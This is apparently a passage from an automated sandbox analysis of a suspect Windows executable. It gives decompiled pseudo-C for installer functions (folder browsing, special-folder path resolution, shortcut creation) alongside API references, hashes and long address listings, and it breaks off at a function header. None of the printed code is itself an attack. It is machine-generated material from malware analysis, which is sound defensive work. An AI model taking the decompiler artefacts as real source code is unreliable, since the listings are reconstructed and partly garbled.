								_t94 = E004047A6(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x42367c + 0x10)) != _t145) {
									E004046F1(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x41f458);
									} else {
										E004046F1(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x423f44 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403F3A(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x42048c == _t145) {
									E004042EB();
								}
								 *0x42048c = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x4204a0;
							_v56 = E0040468B;
							_v52 = _t162;
							_v64 = E00405B88(0x3fb, 0x4204a0, _t162, 0x41f870, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405659(_t162);
								_t125 =  *((intOrPtr*)( *0x423eb0 + 0x11c));
								if( *((intOrPtr*)( *0x423eb0 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E00405B88(0x3fb, 0x4204a0, _t162, 0, _t125);
									if(lstrcmpiA(0x422e40, 0x4204a0) != 0) {
										lstrcatA(_t162, 0x422e40);
									}
								}
								 *0x42048c =  &(( *0x42048c)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E004056C6(_t162) != 0 && E004056ED(_t162) == 0) {
						E00405659(_t162);
					}
					 *0x423678 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403F18(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403F18(_t159);
					E00403F4D(_v12);
					_t138 = E00405E88(7);
					if(_t138 == 0) {
						L53:
						return E00403F7F(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}






































                                                                                        0x0040435c
                                                                                        0x00404363
                                                                                        0x0040436f
                                                                                        0x0040437d
                                                                                        0x00404385
                                                                                        0x00404389
                                                                                        0x0040438f
                                                                                        0x0040438f
                                                                                        0x0040439b
                                                                                        0x0040440f
                                                                                        0x00404416
                                                                                        0x004044eb
                                                                                        0x004044f2
                                                                                        0x00404501
                                                                                        0x00404501
                                                                                        0x00404505
                                                                                        0x0040450b
                                                                                        0x00404518
                                                                                        0x0040451a
                                                                                        0x0040451a
                                                                                        0x00404528
                                                                                        0x0040452d
                                                                                        0x00404530
                                                                                        0x00404537
                                                                                        0x0040453a
                                                                                        0x00404571
                                                                                        0x00404573
                                                                                        0x00404579
                                                                                        0x00404580
                                                                                        0x00404582
                                                                                        0x00404582
                                                                                        0x0040459e
                                                                                        0x004045da
                                                                                        0x00000000
                                                                                        0x004045a0
                                                                                        0x004045a3
                                                                                        0x004045b7
                                                                                        0x004045b9
                                                                                        0x00000000
                                                                                        0x004045b9
                                                                                        0x0040453c
                                                                                        0x00404540
                                                                                        0x0040456f
                                                                                        0x0040456f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404542
                                                                                        0x00404542
                                                                                        0x0040454f
                                                                                        0x00404554
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404558
                                                                                        0x0040455a
                                                                                        0x0040455a
                                                                                        0x00404565
                                                                                        0x00404568
                                                                                        0x0040456d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040456d
                                                                                        0x004045c8
                                                                                        0x004045cf
                                                                                        0x004045d6
                                                                                        0x004045dd
                                                                                        0x004045dd
                                                                                        0x004045e2
                                                                                        0x004045e4
                                                                                        0x004045ec
                                                                                        0x004045f2
                                                                                        0x004045f2
                                                                                        0x00404602
                                                                                        0x0040460c
                                                                                        0x00404614
                                                                                        0x0040462a
                                                                                        0x00404616
                                                                                        0x0040461a
                                                                                        0x0040461a
                                                                                        0x00404614
                                                                                        0x0040462f
                                                                                        0x00404634
                                                                                        0x00404639
                                                                                        0x00404642
                                                                                        0x00404642
                                                                                        0x0040464b
                                                                                        0x0040464d
                                                                                        0x0040464d
                                                                                        0x00404659
                                                                                        0x00404661
                                                                                        0x0040466b
                                                                                        0x0040466b
                                                                                        0x00404670
                                                                                        0x00000000
                                                                                        0x00404670
                                                                                        0x0040453a
                                                                                        0x004044f4
                                                                                        0x004044fb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004044fb
                                                                                        0x0040441c
                                                                                        0x00404422
                                                                                        0x0040443c
                                                                                        0x00404441
                                                                                        0x0040444b
                                                                                        0x00404452
                                                                                        0x00404461
                                                                                        0x00404464
                                                                                        0x00404467
                                                                                        0x0040446e
                                                                                        0x00404476
                                                                                        0x00404479
                                                                                        0x0040447d
                                                                                        0x00404484
                                                                                        0x0040448c
                                                                                        0x004044e4
                                                                                        0x0040448e
                                                                                        0x0040448f
                                                                                        0x00404496
                                                                                        0x004044a0
                                                                                        0x004044a8
                                                                                        0x004044b5
                                                                                        0x004044c9
                                                                                        0x004044cd
                                                                                        0x004044cd
                                                                                        0x004044c9
                                                                                        0x004044d2
                                                                                        0x004044dd
                                                                                        0x004044dd
                                                                                        0x0040448c
                                                                                        0x00000000
                                                                                        0x00404441
                                                                                        0x0040442f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404435
                                                                                        0x00000000
                                                                                        0x0040439d
                                                                                        0x0040439d
                                                                                        0x004043a9
                                                                                        0x004043b3
                                                                                        0x004043c0
                                                                                        0x004043c0
                                                                                        0x004043c6
                                                                                        0x004043cf
                                                                                        0x004043d8
                                                                                        0x004043db
                                                                                        0x004043de
                                                                                        0x004043e6
                                                                                        0x004043e9
                                                                                        0x004043ec
                                                                                        0x004043f4
                                                                                        0x004043fb
                                                                                        0x00404402
                                                                                        0x00404676
                                                                                        0x00404688
                                                                                        0x00404688
                                                                                        0x0040440d
                                                                                        0x00000000
                                                                                        0x0040440d

                                                                                        APIs
                                                                                        • GetDlgItem.USER32 ref: 004043A2
                                                                                        • SetWindowTextA.USER32(?,?), ref: 004043CF
                                                                                        • SHBrowseForFolderA.SHELL32(?,0041F870,?), ref: 00404484
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040448F
                                                                                        • lstrcmpiA.KERNEL32(Call,004204A0,00000000,?,?), ref: 004044C1
                                                                                        • lstrcatA.KERNEL32(?,Call), ref: 004044CD
                                                                                        • SetDlgItemTextA.USER32 ref: 004044DD
                                                                                          • Part of subcall function 0040540B: GetDlgItemTextA.USER32 ref: 0040541E
                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                          • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                          • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                        • GetDiskFreeSpaceA.KERNEL32(0041F468,?,?,0000040F,?,0041F468,0041F468,?,00000000,0041F468,?,?,000003FB,?), ref: 00404596
                                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B1
                                                                                        • SetDlgItemTextA.USER32 ref: 0040462A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp$Call
                                                                                        • API String ID: 2246997448-2678639445
                                                                                        • Opcode ID: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                        • Instruction ID: fa341535892c43c3a67d7fcafb17cb6574160925603278dae289bcadb551eaae
                                                                                        • Opcode Fuzzy Hash: 6525314df4a180c9e7b66623ed26d8b7b6bbf618626a18de822d55977fdbc2f3
                                                                                        • Instruction Fuzzy Hash: 2D9170B1900218BBDB11AFA1CD84AAF7BB8EF45314F10847BF704B6291D77C9A41DB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405B88, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E00405B88(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42367c - 4 + _t36 * 4);
				}
				_t74 =  *0x423ed8 + _t36;
				_t37 = 0x422e40;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422e40;
				if(_a4 - 0x422e40 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405B88(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422e40;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x424000;
							E00405B66(_t86, (_t95 << 0xa) + 0x424000);
						} else {
							E00405AC4(_t86,  *0x423ea8);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DC8(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423f24;
						if( *0x423f24 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423ea4;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423ea8,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423ed8;
							E00405A4D(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423ed8, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405B88(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B66(_a4, _t37);
			}




























                                                                                        0x00405b88
                                                                                        0x00405b88
                                                                                        0x00405b88
                                                                                        0x00405b8e
                                                                                        0x00405b93
                                                                                        0x00405ba4
                                                                                        0x00405ba4
                                                                                        0x00405baf
                                                                                        0x00405bb1
                                                                                        0x00405bb6
                                                                                        0x00405bb9
                                                                                        0x00405bba
                                                                                        0x00405bc1
                                                                                        0x00405bc3
                                                                                        0x00405bc9
                                                                                        0x00405bcc
                                                                                        0x00405bcc
                                                                                        0x00405da5
                                                                                        0x00405da5
                                                                                        0x00405da9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405bd9
                                                                                        0x00405bdf
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405be5
                                                                                        0x00405be6
                                                                                        0x00405be9
                                                                                        0x00405bec
                                                                                        0x00405d98
                                                                                        0x00405da2
                                                                                        0x00405da4
                                                                                        0x00405da4
                                                                                        0x00405d9a
                                                                                        0x00405d9c
                                                                                        0x00405d9e
                                                                                        0x00405d9f
                                                                                        0x00405d9f
                                                                                        0x00000000
                                                                                        0x00405d98
                                                                                        0x00405bf2
                                                                                        0x00405bf6
                                                                                        0x00405c06
                                                                                        0x00405c0a
                                                                                        0x00405c11
                                                                                        0x00405c14
                                                                                        0x00405c18
                                                                                        0x00405c1e
                                                                                        0x00405c21
                                                                                        0x00405c24
                                                                                        0x00405c27
                                                                                        0x00405d42
                                                                                        0x00405d45
                                                                                        0x00405d75
                                                                                        0x00405d78
                                                                                        0x00405d7d
                                                                                        0x00405d81
                                                                                        0x00405d81
                                                                                        0x00405d86
                                                                                        0x00405d87
                                                                                        0x00405d8c
                                                                                        0x00405d8f
                                                                                        0x00405d91
                                                                                        0x00000000
                                                                                        0x00405d91
                                                                                        0x00405d47
                                                                                        0x00405d4a
                                                                                        0x00405d5f
                                                                                        0x00405d66
                                                                                        0x00405d4c
                                                                                        0x00405d53
                                                                                        0x00405d53
                                                                                        0x00405d6e
                                                                                        0x00405d71
                                                                                        0x00405d3a
                                                                                        0x00405d3b
                                                                                        0x00405d3b
                                                                                        0x00000000
                                                                                        0x00405d71
                                                                                        0x00405c2f
                                                                                        0x00405c30
                                                                                        0x00405c36
                                                                                        0x00405c38
                                                                                        0x00405c52
                                                                                        0x00405c52
                                                                                        0x00405c59
                                                                                        0x00405c59
                                                                                        0x00405c60
                                                                                        0x00405c64
                                                                                        0x00405c64
                                                                                        0x00405c65
                                                                                        0x00405c67
                                                                                        0x00405ca0
                                                                                        0x00405ca3
                                                                                        0x00405cb3
                                                                                        0x00405cb6
                                                                                        0x00405cbe
                                                                                        0x00405cc4
                                                                                        0x00405cc4
                                                                                        0x00405d20
                                                                                        0x00405d20
                                                                                        0x00405d22
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405cc8
                                                                                        0x00405ccf
                                                                                        0x00405cd0
                                                                                        0x00405cd2
                                                                                        0x00405cec
                                                                                        0x00405cfa
                                                                                        0x00405d00
                                                                                        0x00405d02
                                                                                        0x00405d1d
                                                                                        0x00405d1d
                                                                                        0x00405d1d
                                                                                        0x00000000
                                                                                        0x00405d1d
                                                                                        0x00405d08
                                                                                        0x00405d13
                                                                                        0x00405d19
                                                                                        0x00405d1b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405d1b
                                                                                        0x00405cd4
                                                                                        0x00405cd7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405ce6
                                                                                        0x00405ce8
                                                                                        0x00405cea
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405cea
                                                                                        0x00000000
                                                                                        0x00405d20
                                                                                        0x00405cab
                                                                                        0x00000000
                                                                                        0x00405c69
                                                                                        0x00405c6e
                                                                                        0x00405c84
                                                                                        0x00405c89
                                                                                        0x00405c8c
                                                                                        0x00405d29
                                                                                        0x00405d29
                                                                                        0x00405d2d
                                                                                        0x00405d35
                                                                                        0x00405d35
                                                                                        0x00000000
                                                                                        0x00405d2d
                                                                                        0x00405c96
                                                                                        0x00405d24
                                                                                        0x00405d24
                                                                                        0x00405d27
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405d27
                                                                                        0x00405c67
                                                                                        0x00405c3a
                                                                                        0x00405c3e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c40
                                                                                        0x00405c44
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00405c46
                                                                                        0x00405c4a
                                                                                        0x00000000
                                                                                        0x00405c4c
                                                                                        0x00405c4c
                                                                                        0x00000000
                                                                                        0x00405c4c
                                                                                        0x00405c4a
                                                                                        0x00405daf
                                                                                        0x00405db9
                                                                                        0x00405dc5
                                                                                        0x00405dc5
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405C30
                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00405CAB
                                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405CBE
                                                                                        • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405CFA
                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405D08
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00405D13
                                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D35
                                                                                        • lstrlenA.KERNEL32(Call,?,0041FC78,00000000,00404F3C,0041FC78,00000000), ref: 00405D87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 900638850-1230650788
                                                                                        • Opcode ID: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                        • Instruction ID: 2bb53c71d9fe9ef1e56bc14ab20fd8486271744d1d3ead2cb2ad614034e11287
                                                                                        • Opcode Fuzzy Hash: 855ce943f005fc76d33ba75c1c33b75b466f9e158227b928842345586457093f
                                                                                        • Instruction Fuzzy Hash: D7510131A04A04AAEF205F64DC88B7B3BA4DF55324F14823BE911B62D0D33C59829E4E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402020, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E00402020() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029F6(0xfffffff0);
				_t96 = E004029F6(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029F6(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029F6(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029F6(0x45);
				if(E004056C6(_t96) == 0) {
					E004029F6(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409368, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409368, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                                        0x00402029
                                                                                        0x00402033
                                                                                        0x0040203c
                                                                                        0x00402046
                                                                                        0x0040204f
                                                                                        0x00402059
                                                                                        0x0040205d
                                                                                        0x0040205d
                                                                                        0x00402062
                                                                                        0x00402073
                                                                                        0x0040207b
                                                                                        0x0040215b
                                                                                        0x0040215b
                                                                                        0x00402162
                                                                                        0x00402081
                                                                                        0x00402081
                                                                                        0x00402092
                                                                                        0x00402096
                                                                                        0x0040209c
                                                                                        0x004020a6
                                                                                        0x004020a8
                                                                                        0x004020b3
                                                                                        0x004020b6
                                                                                        0x004020c3
                                                                                        0x004020c5
                                                                                        0x004020c7
                                                                                        0x004020ce
                                                                                        0x004020d1
                                                                                        0x004020d1
                                                                                        0x004020d4
                                                                                        0x004020de
                                                                                        0x004020e6
                                                                                        0x004020eb
                                                                                        0x004020f7
                                                                                        0x004020f7
                                                                                        0x004020fa
                                                                                        0x00402103
                                                                                        0x00402106
                                                                                        0x0040210f
                                                                                        0x00402114
                                                                                        0x00402126
                                                                                        0x00402135
                                                                                        0x00402137
                                                                                        0x00402143
                                                                                        0x00402143
                                                                                        0x00402135
                                                                                        0x00402145
                                                                                        0x0040214b
                                                                                        0x0040214b
                                                                                        0x0040214e
                                                                                        0x00402154
                                                                                        0x00402159
                                                                                        0x0040216e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00402159
                                                                                        0x00402164
                                                                                        0x0040288e
                                                                                        0x0040289a

                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409368,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ByteCharCreateInstanceMultiWide
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 123533781-501415292
                                                                                        • Opcode ID: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                        • Instruction ID: 0b92ce9401c32f92a97655b67b17bc3e2e7042a2ba93bb40bff56c30807ccd12
                                                                                        • Opcode Fuzzy Hash: 20f8b56c3263d051d76756f701b26ac218ff209cd135641c8178b13e20f06e8d
                                                                                        • Instruction Fuzzy Hash: 94418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040263E, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 39%
